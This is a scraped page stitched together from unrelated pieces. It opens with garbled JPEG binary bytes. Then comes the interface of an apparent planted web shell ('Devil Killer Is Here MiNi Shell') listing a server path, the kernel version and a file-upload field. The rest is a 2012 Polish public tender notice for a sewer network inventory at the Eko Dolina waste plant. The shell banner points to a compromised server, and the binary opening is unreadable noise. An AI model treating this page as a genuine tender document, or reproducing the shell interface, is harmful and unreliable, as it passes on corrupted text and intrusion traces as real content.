JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120323/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120323/91492-N-2012.html

<p class="kh_header"><b>Koleczkowo: INWENTARYZACJA SIECI KANALIZACYJNEJ, WODOCIĄGOWEJ I TECHNOLOGICZNEJ NA TERENIE ZAKŁADU EKO DOLINA Sp. z o. o.</b><br>
<b>Numer ogłoszenia: 91492 - 2012; data zamieszczenia: 23.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> "EKO DOLINA" Sp. z o.o. , Al. Parku Krajobrazowego 99, Łężyce, 84-207 Koleczkowo, woj. pomorskie, tel. 058 6725000, faks 058 6727474.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ekodolina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> INWENTARYZACJA SIECI KANALIZACYJNEJ, WODOCIĄGOWEJ I TECHNOLOGICZNEJ NA TERENIE ZAKŁADU EKO DOLINA Sp. z o. o..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie prac polegających na inwentaryzacji sieci kanalizacji sanitarnej, deszczowej i technologicznej znajdującej się na terenie Zakładu Zagospodarowania Odpadów Eko Dolina w Łężycach. Inwentaryzacja polegać będzie na wykonaniu prac w terenie oraz ekspertyzy oceniającej stan kanalizacji w zakładzie wraz z pomiarami  geodezyjnymi i propozycjami rozwiązań mających na celu  usprawnienie działania  wszystkich układów  sieci kanalizacyjnych  znajdujących się w zakładzie.  Zakres prac  inwentaryzacyjnych obejmować będzie układy kanalizacji sanitarnej, deszczowej i technologicznej podanej w opisie zamówienia.
W zależności od typu kanalizacji zakres prac będzie następujący:  
1.	Kanalizacja grawitacyjna 
Inwentaryzacja sieci grawitacyjnej dotyczyć będzie wszystkich sieci do studni przyłączeniowych do budynków. Inwentaryzacją nie będą objęte sieci wewnątrz budynków znajdujących się w zakładzie. 
Zakres prac wykonywanych na odcinkach grawitacyjnych obejmować będzie:
1) Sprawdzenie szczelności rurociągów - dokumentacja elektroniczna po wykonaniu inspekcji wideo. 
2) Wykazanie nieprawidłowości na badanych odcinkach.
3) Weryfikacja średnic rurociągów zgodnie z dokumentacją przekazana przez Zamawiającego. 
4) Weryfikacja i naniesienie na nowo wykonaną przez geodetę dokumentację powykonawczą wszystkich przyłączeń do układu nie naniesionych na dokumentację dysponowaną przez zamawiającego (wersja elektroniczna pdf i dwg).
5) Czyszczenie rurociągów grawitacyjnych (ścieków bytowych, technologicznych i wód deszczowych).
6) Określenie poprawności wykonania kanalizacji na odcinkach grawitacyjnych.
7) Ocena sprawności kanalizacji (odpowiednie spadki i prędkości przepływu).
8) Wskazanie odcinków które wymagają naprawy lub wymiany.
9) Określenie rzeczywistej  długości odcinków kanalizacji grawitacyjnej. 
Zakres prac na odcinkach kanalizacji grawitacyjnej odnosi się do kanalizacji deszczowej, sanitarnej i technologicznej, których opis podany zostanie w kolejnych punktach 3,4,5.

2. Kanalizacja tłoczna
Ze względu na dużą odległość obiektów kubaturowych od podczyszczalni ścieków, brak dodatkowych dopływów ścieków sanitarnych i technologicznych pomiędzy obiektami kubaturowymi, a podczyszczalnią oraz z powodu ukształtowania terenu dopływ ścieków sanitarnych, technologicznych i wód opadowych  do części zakładu gdzie znajduje się podczyszczalnia i odbywa się  w sposób ciśnieniowy.
Na terenie zakładu wykonano  9 pompowni wyszczególnionych w tabeli 1.

Tabela 1.
L.p.;	Pompownia;	Medium; 	uwagi; 
1;	PS1;	ścieki bytowe;	przepompowywanie ścieków bytowych z budynku administracyjnego;
2;	PS2;	ścieki bytowe;	przepompowywanie ścieków bytowych z budynków technologicznych;
3;	P4;	ścieki bytowe+  technologiczne;	przepompowywanie ścieków bytowych i technologicznych na kratę; 
4;	P2;	odcieki z kwatery B1;	przepompowywane do instalacji RO;
5;	P3;	Odcieki z kwatery B2;	przepompowywane do instalacji RO;
6;	Pd 1;	wody deszczowe;	Przepompowywanie wód deszczowych do zbiornika wód deszczowych;
7;	pompownia 30;	wody deszczowe;	przepompowanie wód deszczowych z zbiornika  30 przez separator lamelowy do zbiornika retencyjnego 35;
8;	pompownia w zb.17;	ścieki z kompostowni;	zawracanie odcieków z kompostowni halowej wykorzystywanej do procesu kompostowania;
9;	29C;	pompownia zrzutowa;	pompownia kierująca podczyszczone ścieki technologiczne i bytowe z zakładu do kanalizacji ogólnospławnej;
 
Zakres prac wykonywanych na odcinkach tłocznych obejmować będzie:
1)	Sprawdzenie wydajności układów pompowych. 
2)	Kontrola charakterystyk pomp i potwierdzenie ich właściwego doboru. 
3)	Wykonanie pomiarów geodezyjnych rurociągów tłocznych kanalizacji technologicznych, sanitarnych, deszczowych   i naniesienie  na dokumentację powykonawczą (w formacie pdf i dwg).
4)	Sprawdzenie szczelności rurociągów tłocznych.
5)	Wykonanie oceny układów pompowych z uwzględnieniem stanu pomp oraz określenie  zakresu zmian mających na celu usprawnienie działania układów pompowych.
Pompownie w zakładzie podłączone są do systemu wizualizacji, który jest podłączony do obiektu dyspozytorni oraz obiektu podczyszczalni. Pompownie sterowane są zdalnie i generują sygnały o stanach pracy, awarii, postoju.   

3.	Opis kanalizacji sanitarnej 
Kanalizacja sanitarna grawitacyjna wykonana jest  z rur PVC 160 -250 prowadzonych ze spadkiem 0,5% pod terenem na głębokości od 1,6 do 2,6 m. W miejscach załamania trasy, podłączenia przykanalików oraz w odległości nie większej niż 50 m instalowane są studnie kanalizacyjne betonowe o średnicy 1,0m.  
 Instalacja sanitarna jest instalacją grawitacyjno - tłoczną. Ścieki bytowe z obiektu 18 (budynek administracyjny) przepompowywane są z pompowni PS1 do studni rozprężnej  SK 19, Do studni SK 19 podłączona jest instalacja kanalizacyjna z wagi wjazdowej. Ścieki sanitarne odprowadzane są ze studni SK 19 grawitacyjnie za pomocą rur PVC 200 do pompowni PS-2. Na odcinku pomiędzy Studniami SK19 - PS2 do rurociągu podłączone są  kolejno obiekty 12 (magazyn odpadów niebezpiecznych), sortownia , kompostownia, natomiast bezpośrednio do pompowni PS2 podłączone są  obiekty nr 7 (szatnia + sterownia), obiekt nr 14 (elektrownia). Z pompowni PS2 ścieki bytowe przepompowywane są rurociągiem tłocznym PEHD 90 mm do pompowni P4. Z pompowni P4 ścieki bytowe kierowane są do kraty umieszczonej przy obiekcie 15 (podczyszczania), a z kraty kierowane są rurociągiem tłocznym PEHD 125 mm do komory ścieków oczyszczonych i przepompowywane są do kanalizacji ogólnospławnej.  

4.	Opis kanalizacji technologicznej 
Z uwagi na charakterystykę  pracy zakładu Eko Dolina w obiektach powstają ścieki technologiczne które kierowane są do podczyszczalni (odcieki z kwatery) lub bezpośrednio do kanalizacji ogólnospławnej  (ścieki spełniające parametry Uchwały  Nr 20 na 2011 Zgromadzenia KZG Dolina Redy i Chylonki dotyczące warunków wprowadzania ścieków przemysłowych do urządzeń kanalizacyjnych). 
a)	Odcieki z kwater składowych 
Odcieki z kwater składowych B1 (pompowniaP2) i B2 (pompownia P3) kierowane są rurociągami PEHD 110 do komory zakwaszania i przepompowywane do podczyszczalni odcieków opartej na technologii odwróconej osmozy. Instalacja produkuje permeat, który kierowany jest do komory ścieków oczyszczonych i przepompowywany jest do kanalizacji ogólnospławnej. W technologii odwróconej osmozy produkowany jest koncentrat który za pomocą rurociągów tłocznych PEHD 110 kierowany jest do studni iniekcyjnych na kwaterze B1.  
b)	Odcieki z kompostowni zielonej (ob.11)
Odcieki z kompostowni zielonej zbierane są w zbiorniku 34 B i grawitacyjnie odprowadzane są do pompowni P4, z której kierowane są na kratę, a z kraty do pompowni ścieków oczyszczonych.
c)	Odcieki  z kwatery odpadów jednorodnych (ob. 3B)
Odcieki z kwatery 3B kierowane są rurociągiem grawitacyjnym 200 mm do pompowni P4 która przepompowuje  ścieki z kwatery na kratę i do komory 29C (komora ścieków oczyszczonych) po czym kierowane są do kanalizacji ogólnospławnej.
d)	Odcieki  z kompostowni halowej (ob.16)
Odcieki technologiczne z kompostowni halowej zbierane są do zbiornika bezodpływowego nr 17 i zawracane są za pomocą instalacji technologicznej do ponownego wykorzystania w procesie kompostowania.

5.	Opis kanalizacji deszczowej
Kanalizacja deszczowa na terenie Zakładu ma za zadanie przechwytywanie i odprowadzanie do zbiorników retencyjnych ścieków deszczowych z terenów dróg, placów utwardzonych oraz dachów. Ścieki deszczowe z terenu placów, dróg oraz dachów zbierane są za pomocą układu wpustów deszczowych i rynien do systemu kanalizacji grawitacyjnej. Ścieki odprowadzane są do zbiornika retencyjnego ścieków deszczowych (ob. nr 30) zlokalizowanego przy podczyszczalni ścieków, z którego są  odprowadzane przez osadnik i separator lamelowy do bezodpływowego zbiornika ziemnego (ob. nr 35). Ścieki gromadzone w tym zbiorniku częściowo odparowują, i częściowo trafiają za pomocą pompy (przy zbiorniku 35) do układu studni chłonnych. Na sieci wykonane są również zbiorniki pośrednie o przetrzymaniu kilkuminutowym wspomagające układ podczas deszczy nawalnych. Są to zbiorniki otwarte o pojemności czynnej do 50m3 obiekt 34a i  obiekt 34b o pojemności czynnej 120m3.Sieć kanalizacyjna wykonana jest z rurociągów grawitacyjnych PVC  o średnicy 200 do 630 mm. Na sieci w miejscach połączeń oraz na odcinkach prostych co 50-70 m wykonane są  studzienki połączeniowe i przelotowe. Część ścieków z drogi dojazdowej od kwatery B2 do B1 zbieranych jest w pompowni PD1 zlokalizowanej przy wjeździe na kwaterę B1 i ta tłoczy je do ostatniej studni najbliższego ciągu grawitacyjnego. Układ taki spowodowany jest niekorzystnym ukształtowaniem terenu.

6.	Szacunkowe ilości rurociągów w zakładzie unieszkodliwiania odpadów 
Inwentaryzacja sieci wykonywana jest w celu określenia dokładnej ilości rurociągów tłocznych i grawitacyjnych w zakładzie Eko Dolina. Podane poniżej zestawienie długości rurociągów jest szacunkowe (mogą występować rozbieżności z stanem faktycznym) i wymagają weryfikacji po inwentaryzacji.
L.p.;	Średnica;	Długość;
Kanalizacja sanitarna grawitacyjna
1;	PVC 160;	37,0 m;
2;	PVC 200;	722,0 m;
Kanalizacja deszczowa grawitacyjna
1;	PVC 160;	755,0;
2;	PVC 200;	141,5;
3;	PVC 250;	1537,5;
4;	PVC 315;	32,5;
5;	PVC 400;	822,5;
6;	PVC 500;	1091,0;
7;	PVC 630;	250,0;
8;	PVC 200 do studni chłonnych; 	81,0 m;
9;	PVC 200 do zbiornika ob. nr 35;	23,1 m;
Kanalizacja technologiczna
1;	PEHD De 200;	394,0 m;
2;	PEHD De 250;	47,0 m;
Rurociąg tłoczny  ścieków sanitarnych z PS1 
1;	PEHD De 90 PN 10;	469,0 m;
Rurociąg tłoczny  ścieków sanitarnych z PS2
2;	PEHD De 75 PN 10;	151,5 m;
Rurociąg tłoczny ścieków i odcieków z pompowni P4
3;	PEHD De 125 PN 10;	714,0 m;
Rurociąg tłoczny  odcieków ze składowiska z pompowni P3
4;	PEHD De 110 PN 10;	441,5 m;
Rurociąg tłoczny  ścieków deszczowych z PD1

5;	PEHD De 90 PN 10;	196,5 m;
Rurociąg tłoczny  ścieków deszczowych ze zbiornika 30
6;	PEHD De 90 PN 10;	41,0 m;
Rurociąg tłoczny  ścieków deszczowych z zbiornika 35 (studni chłonne
7;	PEHD 75 PN10; 	353,5 m;
Rury osłonowe stalowe zabezpieczone antykorozyjnie
1;	355,6/8mm;	91,5 m;
2;	273/5mm;	11,0 m;
3;	219,1/8mm;	260,5 m;
4;	133/5 mm;	8,5 m;
5;	108/6mm;	49,0 m;
6;	70/5 mm;	14,0 m;
7;	60,3/4 mm;	7,0 m;

7.	Załącznikami do opisu zamówienia są aktualne mapy uwzględniające układy sieci kanalizacyjne wymienione w punktach 3,4,5..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia wykonawcy zamówień uzupełniających w wysokości 10%.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.25.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Ustala się wadium w wysokości: 3.900,00 zł  (słownie: trzy tysiące dziewięćset złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenie spełniania tego warunku Zamawiający będzie badać na podstawie złożonych przez Wykonawcę wraz z ofertą następujących dokumentów:
1. Oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z załącznikiem nr 2 do SIWZ (w przypadku Wykonawców składających wspólną ofertę, oświadczenie o spełnianiu warunków udziału w postępowaniu w zakresie wynikającym z zapisów art. 22 ust. 1 pkt 1-4 PZP - musi być podpisane przez wszystkich Wykonawców składających wspólną ofertę lub przez pełnomocnika upoważnionego do reprezentowania ich w postępowaniu lub do reprezentowania ich w postępowaniu i podpisania umowy w sprawie zamówienia).
Zamawiający sprawdzi prawidłowość złożonych dokumentów i zgodność z wyżej wymienionymi, jako wymaganymi do wzięcia udziału w przetargu. Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na podstawie załączonych dokumentów i oświadczeń, zgodnie z formułą spełnia-nie spełnia. Z treści załączonych do oferty dokumentów musi wynikać jednoznacznie, że ww. warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>(a)	Wykonawca musi wykazać wykonanie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usługi w zakresie:
- co najmniej wykonanej jednej inwentaryzacji sieci wodociągowej lub kanalizacyjnej lub mieszanej ( wod.-kan.) o długości co najmniej 5 km.
Potwierdzenie spełniania tego warunku Zamawiający będzie badać na podstawie złożonych przez Wykonawcę wraz z ofertą następujących dokumentów:
 (i)  Oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z załącznikiem nr 2 (W przypadku Wykonawców składających wspólną ofertę, Oświadczenie o spełnianiu warunków udziału w postępowaniu w zakresie wynikającym z zapisów art. 22 ust. 1 pkt 1-4 PZP - musi być podpisane przez wszystkich Wykonawców składających wspólną ofertę lub przez Pełnomocnika upoważnionego do reprezentowania ich w postępowaniu lub do reprezentowania ich w postępowaniu i podpisania umowy w sprawie zamówienia;)
(ii) wykaz wykonanych zamówień (jeden wspólny wykaz w przypadku Wykonawców składających ofertę wspólną), sporządzony według załącznika nr 4. Do wykazu należy dołączyć dokumenty potwierdzające, że usługi zostały wykonane lub są wykonywane należycie;
(iii) Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia; Wykonawca może w tym celu wykorzystać załącznik nr 4A do SIWZ;
Zamawiający sprawdzi prawidłowość złożonych dokumentów i zgodność z wyżej wymienionymi, jako wymaganymi do wzięcia udziału w przetargu. Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na podstawie załączonych dokumentów i oświadczeń, zgodnie z formułą spełnia-nie spełnia. Z treści załączonych do oferty dokumentów musi wynikać jednoznacznie, że ww. warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) Wykonawca musi wykazać się dysponowaniem potencjałem technicznym w ilości i rodzaju pozwalającym na realizację zamówienia w wyznaczonym terminie w umowie, tj.: 
- Z uwagi na konieczność wykonania inspekcji wideo kanalizacji wymagane jest aby wykonujący zadanie miał zapewniony dostęp do kamery inspekcyjnej.
- Wymagane jest aby po stronie wykonującego zamówienie zapewnić odpowiedni sprzęt wielofunkcyjny z recyklingiem do czyszczenia sieci rurociągów. 
Potwierdzenie spełniania tego warunku Zamawiający będzie badać na podstawie złożonych przez Wykonawcę wraz z ofertą następujących dokumentów:
 (i)  Oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z załącznikiem nr2. (W przypadku Wykonawców składających wspólną ofertę, Oświadczenie o spełnianiu warunków udziału w postępowaniu w zakresie wynikającym z zapisów art. 22 ust. 1 pkt 1-4 PZP - musi być podpisane przez wszystkich Wykonawców składających wspólną ofertę lub przez Pełnomocnika upoważnionego do reprezentowania ich w postępowaniu lub do reprezentowania ich w postępowaniu i podpisania umowy w sprawie zamówienia;)
(ii) wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych (jeden wspólny wykaz w przypadku Wykonawców składających ofertę wspólną) dostępnych wykonawcy w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami zgodnie z załącznikiem nr 5;
(iii) Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia; Wykonawca może w tym celu wykorzystać załącznik nr 5A do SIWZ;
Potwierdzenie spełniania tego warunku Zamawiający będzie badać na podstawie złożonych przez Wykonawcę wraz z ofertą następujących dokumentów:
 (i)  Oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z załącznikiem nr 2. W przypadku Wykonawców składających wspólną ofertę, Oświadczenie o spełnianiu warunków udziału w postępowaniu w zakresie wynikającym z zapisów art. 22 ust. 1 pkt 1-4 PZP - musi być podpisane przez wszystkich Wykonawców składających wspólną ofertę lub przez Pełnomocnika upoważnionego do reprezentowania ich w postępowaniu lub do reprezentowania ich w postępowaniu i podpisania umowy w sprawie zamówienia;.
(iii) Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia; Wykonawca może w tym celu wykorzystać załącznik nr 6A do SIWZ;
Zamawiający sprawdzi prawidłowość złożonych dokumentów i zgodność z wyżej wymienionymi, jako wymaganymi do wzięcia udziału w przetargu. Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na podstawie załączonych dokumentów i oświadczeń, zgodnie z formułą spełnia-nie spełnia. Z treści załączonych do oferty dokumentów musi wynikać jednoznacznie, że ww. warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się dysponowaniem osobami zdolnymi do wykonania zamówienia tzw. osobami Personelu kluczowego tj.:
o	Inspektor Nadzoru robót sanitarnych musi spełniać następujące wymagania:
- posiadać uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych  bez ograniczeń lub posiadać równoważne kwalifikacje zawodowe uznane na zasadach określonych zgodnie przepisami polskiego prawa.
o	Geodeta musi spełniać następujące wymagania:
- posiadać uprawnienia lub posiadać równoważne kwalifikacje zawodowe uznane na zasadach określonych zgodnie przepisami polskiego prawa.

(iii) Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia; Wykonawca może w tym celu wykorzystać załącznik nr 6A do SIWZ;
(iv) oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień zgodnie z załącznikiem nr 7
Zamawiający sprawdzi prawidłowość złożonych dokumentów i zgodność z wyżej wymienionymi, jako wymaganymi do wzięcia udziału w przetargu. Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na podstawie załączonych dokumentów i oświadczeń, zgodnie z formułą spełnia-nie spełnia. Z treści załączonych do oferty dokumentów musi wynikać jednoznacznie, że ww. warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenie spełniania tego warunku Zamawiający będzie badać na podstawie złożonych przez Wykonawcę wraz z ofertą następujących dokumentów:
 (i)  Oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z załącznikiem nr 2. (W przypadku Wykonawców składających wspólną ofertę, Oświadczenie o spełnianiu warunków udziału w postępowaniu w zakresie wynikającym z zapisów art. 22 ust. 1 pkt 1-4 PZP - musi być podpisane przez wszystkich Wykonawców składających wspólną ofertę lub przez Pełnomocnika upoważnionego do reprezentowania ich w postępowaniu lub do reprezentowania ich w postępowaniu i podpisania umowy w sprawie zamówienia;)
